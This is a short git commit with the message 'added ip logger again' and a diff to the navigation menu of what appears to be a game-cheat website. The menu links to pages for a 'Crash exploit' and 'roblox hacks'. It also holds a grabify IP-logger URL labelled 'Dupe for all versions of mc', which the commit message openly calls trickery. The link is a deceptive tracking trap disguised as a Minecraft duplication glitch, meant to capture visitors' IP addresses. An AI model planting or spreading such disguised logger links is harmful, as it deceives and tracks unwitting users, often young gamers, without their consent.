added ip logger again
we participate in a miniscule amount of mental trickery.

--- a/client.html
+++ b/client.html
@@ -79,11 +79,12 @@
   </script>
 <div id="mySidenav" class="sidenav">
   <a href="index.html">Home</a>
-  <a href="client.html">heck client</a>
+  <a href="client.html">Client</a>
   <a href="https://grabify.link/6D6ROG">Dupe for all versions of mc</a>
   <a href="abt me.html">about me</a>
   <a href="discord.html">Discord stuff</a>
   <a href="crash.html">Crash exploit</a>
+  <a href="roblox.html">roblox hacks</a>
 
 </div>
 <span style="font-size:30px;cursor:pointer" onclick="openNav()">&#9776; </span>
